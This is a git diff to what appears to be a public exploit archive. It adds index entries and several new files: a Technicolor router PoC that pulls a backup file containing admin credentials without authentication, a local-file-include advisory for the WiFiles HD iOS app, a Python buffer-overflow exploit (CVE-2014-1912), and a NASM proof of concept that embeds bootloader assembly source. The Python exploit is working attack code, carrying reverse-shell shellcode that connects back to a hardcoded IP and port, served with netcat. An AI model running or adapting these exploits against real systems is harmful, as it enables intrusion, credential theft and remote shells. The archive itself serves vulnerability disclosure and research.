diff --git a/files.csv b/files.csv index 45a41f23a..7eeafc5cf 100755 --- a/files.csv +++ b/files.csv @@ -10037,7 +10037,7 @@ id,file,description,date,author,platform,type,port 10837,platforms/php/webapps/10837.txt,"Quick Poll (code.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 10838,platforms/php/webapps/10838.txt,"list Web (addlink.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip (store_info.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 -10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 - Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0 +10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 (.asx) - Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0 10841,platforms/php/webapps/10841.pl,"pL-PHP <= beta 0.9 - Local File Include Exploit",2009-12-31,"cr4wl3r ",php,webapps,0 10842,platforms/windows/dos/10842.py,"SimplePlayer 0.2 - (.wav) overflow DoS Exploit (0day)",2009-12-31,mr_me,windows,dos,0 10844,platforms/php/webapps/10844.txt,"Joomla Component com_portfol SQL Injection Vulnerability",2009-12-31,"wlhaan hacker",php,webapps,0 @@ -10871,7 +10871,7 @@ id,file,description,date,author,platform,type,port 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ITSecTeam,php,webapps,0 11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 multi file include",2010-03-27,ITSecTeam,php,webapps,0 11904,platforms/php/webapps/11904.txt,"68kb multi remote file include",2010-03-27,ITSecTeam,php,webapps,0 -11905,platforms/php/webapps/11905.txt,"Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0 +11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities.",2010-03-27,"cp77fk4r ",php,webapps,0 11908,platforms/php/webapps/11908.txt,"Joomla Component com_solution SQL Injection Vulnerability",2010-03-27,"DevilZ TM",php,webapps,0 11909,platforms/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 - Local stack overflow exploit",2010-03-28,"Hazem mofeed",windows,local,0 @@ -11629,7 +11629,7 @@ id,file,description,date,author,platform,type,port 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent (idproperty) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0 12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit",2010-05-28,Dr_IDE,windows,dos,0 -12775,platforms/multiple/dos/12775.py,"VLC Media Player <= 1.0.6 - Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0 +12775,platforms/multiple/dos/12775.py,"VLC Media Player <= 1.0.6 (.avi) - Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0 12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability",2010-05-28,CoBRa_21,php,webapps,0 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent (news.php) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0 12779,platforms/php/webapps/12779.txt,"Joomla Component My Car Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0 @@ -16203,7 +16203,7 @@ id,file,description,date,author,platform,type,port 18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 Memory Corruption",2012-04-19,shinnai,multiple,dos,0 18755,platforms/windows/dos/18755.c,"MS11-046 Afd.sys Proof of Concept",2012-04-19,fb1h2s,windows,dos,0 18756,platforms/multiple/dos/18756.txt,"OpenSSL ASN1 BIO Memory Corruption Vulnerability",2012-04-19,"Tavis Ormandy",multiple,dos,0 -18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 division by zero vulnerability",2012-04-19,"Senator of Pirates",windows,dos,0 +18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 (.mp4) - Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0 18758,platforms/multiple/dos/18758.txt,"Wireshark 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0 18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 ST WRQ Buffer Overflow",2012-04-20,metasploit,windows,remote,0 18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,metasploit,windows,local,0 @@ -19137,7 +19137,7 @@ id,file,description,date,author,platform,type,port 21886,platforms/php/webapps/21886.txt,"Py-Membres 3.1 Index.PHP Unauthorized Access Vulnerability",2002-10-02,frog,php,webapps,0 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0 21888,platforms/windows/remote/21888.rb,"KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability",2012-10-11,metasploit,windows,remote,0 -21889,platforms/windows/dos/21889.pl,"VLC Player <= 2.0.3 ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0 +21889,platforms/windows/dos/21889.pl,"VLC Player <= 2.0.3 (.png) - ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0 21890,platforms/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 21892,platforms/windows/local/21892.txt,"FileBound 6.2 Privilege Escalation Vulnerability",2012-10-11,"Nathaniel Carew",windows,local,0 @@ -20413,7 +20413,7 @@ id,file,description,date,author,platform,type,port 23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0 23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow Vulnerability",2003-09-30,"Luigi Auriemma",linux,dos,0 -23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 Crash PoC",2012-12-07,coolkaveh,windows,dos,0 +23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 (.swf) - Crash PoC",2012-12-07,coolkaveh,windows,dos,0 23202,platforms/freebsd/webapps/23202.txt,"m0n0wall 1.33 Multiple CSRF Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps,0 23203,platforms/windows/remote/23203.rb,"IBM System Director Agent DLL Injection",2012-12-07,metasploit,windows,remote,0 23204,platforms/linux/local/23204.c,"Silly Poker 0.25.5 - Local HOME Environment Variable Buffer Overrun Vulnerability",2003-09-30,demz,linux,local,0 @@ -28663,6 +28663,7 @@ id,file,description,date,author,platform,type,port 31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0 31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 PNM File Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0 31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0 +31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,@sha0coder,linux,remote,0 31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0 31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 @@ -28681,3 +28682,16 @@ id,file,description,date,author,platform,type,port 31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0 31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 'p' Parameter Cross Site Scripting Vulnerability",2008-06-10,Unohope,cgi,webapps,0 31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0 +31894,platforms/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80 +31896,platforms/hardware/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion Vulnerability",2014-02-25,Vulnerability-Lab,hardware,webapps,8080 +31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection Vulnerability",2014-02-25,Hurley,php,webapps,80 +31901,platforms/multiple/remote/31901.txt,"Sun Glassfish 2.1 'name' Parameter Cross Site Scripting Vulnerability",2008-06-10,"Eduardo Neves",multiple,remote,0 +31902,platforms/php/webapps/31902.txt,"Noticia Portal 'detalle_noticia.php' SQL Injection Vulnerability",2008-06-10,t@nzo0n,php,webapps,0 +31903,platforms/linux/remote/31903.asm,"NASM 2.0 'ppscan()' Off-By-One Buffer Overflow Vulnerability",2008-06-21,"Philipp Thomas",linux,remote,0 +31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 +31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 admin/login.php username Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 +31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 last_records.php annuaire Parameter XSS",2008-06-11,"Sylvain THUAL",php,webapps,0 +31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 annuaire.php Multiple Parameter XSS",2008-06-11,"Sylvain THUAL",php,webapps,0 +31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0 +31909,platforms/windows/remote/31909.html,"XChat 2.8.7b 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0 +31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0 diff --git a/platforms/hardware/webapps/31894.txt b/platforms/hardware/webapps/31894.txt new file mode 100755 index 000000000..52feacbaf --- /dev/null +++ b/platforms/hardware/webapps/31894.txt @@ -0,0 +1,31 @@ +# Exploit Title: Technicolor TC7200: Authentication Bypass +# Google Dork: N/A +# Date: 24-02-2014 +# Exploit Author: Jeroen - IT Nerdbox +# Vendor Homepage: http://www.technicolor.com/ +# Software Link: http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300 +# Version: STD6.01.12 +# Tested on: N/A +# CVE : CVE-2014-1677 +# + +## Description: +# +# Any user on the internal network can download a backup configuration file without authenticating first. The backup file contains +# the credentials to the administrative web interface. +# +## PoC: +# +# Download the file: http://192.168.0.1/goform/system/GatewaySettings.bin +# +# Using the command: $ hexedit -C GatewaySettings.bin +# +# 00006590 00 00 00 00 00 00 00 00 30 4d 4c 6f 67 00 06 00 |........0MLog...| +# 000065a0 05 61 64 6d 69 6e 00 15 6d 79 73 75 70 65 72 73 |.admin..mysupers| +# 000065b0 65 63 72 65 74 70 61 73 73 77 6f 72 64 00 06 75 |ecretpassword..u| +# 000065c0 70 63 63 73 72 00 00 |pccsr..| +# 000065c7 +# +# + +# More information can be found at:http://www.nerdbox.it/technicolor-tc7200-auth-bypass-dos/ diff --git a/platforms/hardware/webapps/31896.txt b/platforms/hardware/webapps/31896.txt new file mode 100755 index 000000000..5f51fdf88 --- /dev/null +++ b/platforms/hardware/webapps/31896.txt @@ -0,0 +1,186 @@ +Document Title: +=============== +WiFiles HD v1.3 iOS - File Include Web Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1214 + + +Release Date: +============= +2014-02-22 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1214 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Product & Service Introduction: +=============================== +WiFiles HD for iPad is an easy to use file storage/sharing app. Transfer files using wifi or iTunes File Transfer to & from your Mac/PC with ease. +Updated- transfer files in background now supported. Store movies, photos, music, and any other file you wish. In app filesharing supports opening +files in supporting third party apps. + +( Copy of the Homepage: https://itunes.apple.com/us/app/wifiles-hd/id436227200 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official Mr Burns - WiFiles HD v1.4 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-02-22: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Apple AppStore +Product: WiFiles HD - iOS Web Server & Web Application 1.3 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include vulnerability has been discovered in the official WiFiles HD v1.4 iOS mobile web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests +or system specific path commands to compromise the web-application/device. + +The vulnerability is located in the upload module of the mobile web-application interface. Remote attackers can +manipulate the `upload > submit` POST method request with the vulnerable `filename` value to compromise the application +or connected device components. + +The issue allows remote attackers to include local app path values or wifi web-server files. The exploitation appears +on the application-side and the inject request method is POST. The exection occurs in the main index file dir list. +The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability +scoring system) count of 7.0(+)|(-)7.1. + +Exploitation of the local file include vulnerability requires no user interaction or privileged mobile application user account. +Successful exploitation of the file include web vulnerability results in mobile application compromise, connected device compromise +or web-server compromise. + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] Upload + +Vulnerable Procedure(s): + [+] Submit + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] File Dir Index Listing (http://localhost:8080) + + +Proof of Concept (PoC): +======================= +The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction. +For security demonstration or to reproduce the file include web vulnerability follow the provided information and steps below to continue. + +PoC: Exploit - filename + +Files from WiFiles HD

WiFiles HD:

+Please do not leave this page until transfers are complete. +Refresh the page before attempting to transfer files if you close the server in WiFiles HD. +

137.png +( 279.0 Kb, 2014-02-22 14:04:01 +0000)
+e4c167621c2e61.jpg +( 23.8 Kb, 2014-02-22 14:04:10 +0000)
+<./<[LOCAL FILE INCLUDE VULNERABILITY!]>"> +( 23.8 Kb, 2014-02-22 14:09:20 +0000)
+

+

+ + +--- PoC Session Logs [POST] --- + +04:02:59.326[191ms][total 1633ms] Status: 200[OK] +POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1056] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8080/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------213382078724824 +Content-Disposition: form-data; name="file"; filename="./<[LOCAL FILE INCLUDE VULNERABILITY!]>" +Content-Type: image/jpeg + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure encode, parse and restriction of the vulnerable filename value in the upload POST method request. + + +Security Risk: +============== +The security risk of the local file include web vulnerability is estimated as high. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/linux/remote/31875.py b/platforms/linux/remote/31875.py new file mode 100755 index 000000000..b27638b16 --- /dev/null +++ b/platforms/linux/remote/31875.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +''' +# Exploit Title: python socket.recvfrom_into() remote buffer overflow +# Date: 21/02/2014 +# Exploit Author: @sha0coder +# Vendor Homepage: python.org +# Version: python2.7 and python3 +# Tested on: linux 32bit + python2.7 +# CVE : CVE-2014-1912 + + + +socket.recvfrom_into() remote buffer overflow Proof of concept +by @sha0coder + +TODO: rop to evade stack nx + + +(gdb) x/i $eip +=> 0x817bb28: mov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol + 0x817bb2b: test BYTE PTR [eax+0x55],0x40 + 0x817bb2f: jne 0x817bb38 --> + ... + 0x817bb38: mov eax,DWORD PTR [eax+0xa4] <--- eax full control again + 0x817bb3e: test eax,eax + 0x817bb40: jne 0x817bb58 --> + ... + 0x817bb58: mov DWORD PTR [esp],ebx + 0x817bb5b: call eax <--------------------- indirect fucktion call ;) + + +$ ./pyrecvfrominto.py + egg file generated + +$ cat egg | nc -l 8080 -vv + +... when client connects ... or wen we send the evil buffer to the server ... + +0x0838591c in ?? () +1: x/5i $eip +=> 0x838591c: int3 <--------- LANDED!!!!! + 0x838591d: xor eax,eax + 0x838591f: xor ebx,ebx + 0x8385921: xor ecx,ecx + 0x8385923: xor edx,edx + +''' + +import struct + +def off(o): + return struct.pack('L',o) + + +reverseIP = '\xc0\xa8\x04\x34' #'\xc0\xa8\x01\x0a' +reversePort = '\x7a\x69' + + +#shellcode from exploit-db.com, (remove the sigtrap) +shellcode = "\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\ + "\xb0\x66\xb3\x01\x51\x6a\x06\x6a"\ + "\x01\x6a\x02\x89\xe1\xcd\x80\x89"\ + "\xc6\xb0\x66\x31\xdb\xb3\x02\x68"+\ + reverseIP+"\x66\x68"+reversePort+"\x66\x53\xfe"\ + "\xc3\x89\xe1\x6a\x10\x51\x56\x89"\ + "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"\ + "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"\ + "\xc0\x52\x68\x6e\x2f\x73\x68\x68"\ + "\x2f\x2f\x62\x69\x89\xe3\x52\x53"\ + "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"\ + "\x80" + + +shellcode_sz = len(shellcode) + +print 'shellcode sz %d' % shellcode_sz + + +ebx = 0x08385908 +sc_off = 0x08385908+20 + +padd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM' + +''' + +------------+----------------------+ +--------------------+ + | | | | | + V | | V | +''' +buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;) + + +print 'buff sz: %s' % len(buff) +open('egg','w').write(buff) diff --git a/platforms/linux/remote/31903.asm b/platforms/linux/remote/31903.asm new file mode 100755 index 000000000..a2155bf0c --- /dev/null +++ b/platforms/linux/remote/31903.asm @@ -0,0 +1,1589 @@ +source: http://www.securityfocus.com/bid/29656/info + +NASM is prone to an off-by-one buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. + +Successfully exploiting this issue will allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +NASM 2.02 and prior versions are vulnerable. + +; -*- fundamental -*- (asm-mode sucks) +; **************************************************************************** +; +; ldlinux.asm +; +; A program to boot Linux kernels off an MS-DOS formatted floppy disk. This +; functionality is good to have for installation floppies, where it may +; be hard to find a functional Linux system to run LILO off. +; +; This program allows manipulation of the disk to take place entirely +; from MS-LOSS, and can be especially useful in conjunction with the +; umsdos filesystem. +; +; Copyright (C) 1994-2005 H. Peter Anvin +; +; This program is free software; you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, Inc., 53 Temple Place Ste 330, +; Boston MA 02111-1307, USA; either version 2 of the License, or +; (at your option) any later version; incorporated herein by reference. +; +; **************************************************************************** + +%ifndef IS_MDSLINUX +%define IS_SYSLINUX 1 +%endif + +%define WITH_GFX 1 + +%include "head.inc" + +; +; Some semi-configurable constants... change on your own risk. +; +my_id equ syslinux_id +FILENAME_MAX_LG2 equ 4 ; log2(Max filename size Including final null) +FILENAME_MAX equ 11 ; Max mangled filename size +NULLFILE equ ' ' ; First char space == null filename +NULLOFFSET equ 0 ; Position in which to look +retry_count equ 16 ; How patient are we with the disk? +%assign HIGHMEM_SLOP 0 ; Avoid this much memory near the top +LDLINUX_MAGIC equ 0x3eb202fe ; A random number to identify ourselves with + +MAX_OPEN_LG2 equ 6 ; log2(Max number of open files) +MAX_OPEN equ (1 << MAX_OPEN_LG2) + +SECTOR_SHIFT equ 9 +SECTOR_SIZE equ (1 << SECTOR_SHIFT) + +; +; This is what we need to do when idle +; +%macro RESET_IDLE 0 + ; Nothing +%endmacro +%macro DO_IDLE 0 + ; Nothing +%endmacro + +; +; The following structure is used for "virtual kernels"; i.e. LILO-style +; option labels. The options we permit here are `kernel' and `append +; Since there is no room in the bottom 64K for all of these, we +; stick them at vk_seg:0000 and copy them down before we need them. +; + struc vkernel +vk_vname: resb FILENAME_MAX ; Virtual name **MUST BE FIRST!** +vk_rname: resb FILENAME_MAX ; Real name +vk_appendlen: resw 1 + alignb 4 +vk_append: resb max_cmd_len+1 ; Command line + alignb 4 +vk_end: equ $ ; Should be <= vk_size + endstruc + +; +; Segment assignments in the bottom 640K +; Stick to the low 512K in case we're using something like M-systems flash +; which load a driver into low RAM (evil!!) +; +; 0000h - main code/data segment (and BIOS segment) +; +real_mode_seg equ 4000h +cache_seg equ 3000h ; 64K area for metadata cache +vk_seg equ 2000h ; Virtual kernels +xfer_buf_seg equ 1000h ; Bounce buffer for I/O to high mem +comboot_seg equ real_mode_seg ; COMBOOT image loading zone +first_free_seg equ 5000h ; end of syslinux used memory + +; +; File structure. This holds the information for each currently open file. +; + struc open_file_t +file_sector resd 1 ; Sector pointer (0 = structure free) +file_left resd 1 ; Number of sectors left + endstruc + +%ifndef DEPEND +%if (open_file_t_size & (open_file_t_size-1)) +%error "open_file_t is not a power of 2" +%endif +%endif + +; --------------------------------------------------------------------------- +; BEGIN CODE +; --------------------------------------------------------------------------- + +; +; Memory below this point is reserved for the BIOS and the MBR +; + section .earlybss +trackbufsize equ 8192 +trackbuf resb trackbufsize ; Track buffer goes here +getcbuf resb trackbufsize + ; ends at 4800h + + section .bss + alignb 8 + + ; Expanded superblock +SuperInfo equ $ + resq 16 ; The first 16 bytes expanded 8 times +FAT resd 1 ; Location of (first) FAT +RootDirArea resd 1 ; Location of root directory area +RootDir resd 1 ; Location of root directory proper +DataArea resd 1 ; Location of data area +RootDirSize resd 1 ; Root dir size in sectors +TotalSectors resd 1 ; Total number of sectors +EndSector resd 1 ; Location of filesystem end +ClustSize resd 1 ; Bytes/cluster +ClustMask resd 1 ; Sectors/cluster - 1 +CopySuper resb 1 ; Distinguish .bs versus .bss +DriveNumber resb 1 ; BIOS drive number +ClustShift resb 1 ; Shift count for sectors/cluster +ClustByteShift resb 1 ; Shift count for bytes/cluster + + alignb open_file_t_size +Files resb MAX_OPEN*open_file_t_size + +; +; Constants for the xfer_buf_seg +; +; The xfer_buf_seg is also used to store message file buffers. We +; need two trackbuffers (text and graphics), plus a work buffer +; for the graphics decompressor. +; +xbs_textbuf equ 0 ; Also hard-coded, do not change +xbs_vgabuf equ trackbufsize +xbs_vgatmpbuf equ 2*trackbufsize + + + section .text +; +; Some of the things that have to be saved very early are saved +; "close" to the initial stack pointer offset, in order to +; reduce the code size... +; +StackBuf equ $-44-32 ; Start the stack here (grow down - 4K) +PartInfo equ StackBuf ; Saved partition table entry +FloppyTable equ PartInfo+16 ; Floppy info table (must follow PartInfo) +OrigFDCTabPtr equ StackBuf-4 ; The high dword on the stack + +; +; Primary entry point. Tempting as though it may be, we can't put the +; initial "cli" here; the jmp opcode in the first byte is part of the +; "magic number" (using the term very loosely) for the DOS superblock. +; +bootsec equ $ + jmp short start ; 2 bytes + nop ; 1 byte +; +; "Superblock" follows -- it's in the boot sector, so it's already +; loaded and ready for us +; +bsOemName db 'SYSLINUX' ; The SYS command sets this, so... +; +; These are the fields we actually care about. We end up expanding them +; all to dword size early in the code, so generate labels for both +; the expanded and unexpanded versions. +; +%macro superb 1 +bx %+ %1 equ SuperInfo+($-superblock)*8+4 +bs %+ %1 equ $ + zb 1 +%endmacro +%macro superw 1 +bx %+ %1 equ SuperInfo+($-superblock)*8 +bs %+ %1 equ $ + zw 1 +%endmacro +%macro superd 1 +bx %+ %1 equ $ ; no expansion for dwords +bs %+ %1 equ $ + zd 1 +%endmacro +superblock equ $ + superw BytesPerSec + superb SecPerClust + superw ResSectors + superb FATs + superw RootDirEnts + superw Sectors + superb Media + superw FATsecs + superw SecPerTrack + superw Heads +superinfo_size equ ($-superblock)-1 ; How much to expand + superd Hidden + superd HugeSectors + ; + ; This is as far as FAT12/16 and FAT32 are consistent + ; + zb 54 ; FAT12/16 need 26 more bytes, + ; FAT32 need 54 more bytes +superblock_len equ $-superblock + +SecPerClust equ bxSecPerClust +; +; Note we don't check the constraints above now; we did that at install +; time (we hope!) +; +start: + cli ; No interrupts yet, please + cld ; Copy upwards +; +; Set up the stack +; + xor ax,ax + mov ss,ax + mov sp,StackBuf ; Just below BSS + mov es,ax +; +; DS:SI may contain a partition table entry. Preserve it for us. +; + mov cx,8 ; Save partition info + mov di,sp + rep movsw + + mov ds,ax ; Now we can initialize DS... + +; +; Now sautee the BIOS floppy info block to that it will support decent- +; size transfers; the floppy block is 11 bytes and is stored in the +; INT 1Eh vector (brilliant waste of resources, eh?) +; +; Of course, if BIOSes had been properly programmed, we wouldn't have +; had to waste precious space with this code. +; + mov bx,fdctab + lfs si,[bx] ; FS:SI -> original fdctab + push fs ; Save on stack in case we need to bail + push si + + ; Save the old fdctab even if hard disk so the stack layout + ; is the same. The instructions above do not change the flags + mov [DriveNumber],dl ; Save drive number in DL + and dl,dl ; If floppy disk (00-7F), assume no + ; partition table + js harddisk + +floppy: + mov cl,6 ; 12 bytes (CX == 0) + ; es:di -> FloppyTable already + ; This should be safe to do now, interrupts are off... + mov [bx],di ; FloppyTable + mov [bx+2],ax ; Segment 0 + fs rep movsw ; Faster to move words + mov cl,[bsSecPerTrack] ; Patch the sector count + mov [di-8],cl + ; AX == 0 here + int 13h ; Some BIOSes need this + + jmp short not_harddisk +; +; The drive number and possibly partition information was passed to us +; by the BIOS or previous boot loader (MBR). Current "best practice" is to +; trust that rather than what the superblock contains. +; +; Would it be better to zero out bsHidden if we don't have a partition table? +; +; Note: di points to beyond the end of PartInfo +; +harddisk: + test byte [di-16],7Fh ; Sanity check: "active flag" should + jnz no_partition ; be 00 or 80 + mov eax,[di-8] ; Partition offset (dword) + mov [bsHidden],eax +no_partition: +; +; Get disk drive parameters (don't trust the superblock.) Don't do this for +; floppy drives -- INT 13:08 on floppy drives will (may?) return info about +; what the *drive* supports, not about the *media*. Fortunately floppy disks +; tend to have a fixed, well-defined geometry which is stored in the superblock. +; + ; DL == drive # still + mov ah,08h + int 13h + jc no_driveparm + and ah,ah + jnz no_driveparm + shr dx,8 + inc dx ; Contains # of heads - 1 + mov [bsHeads],dx + and cx,3fh + mov [bsSecPerTrack],cx +no_driveparm: +not_harddisk: +; +; Ready to enable interrupts, captain +; + sti + +; +; Do we have EBIOS 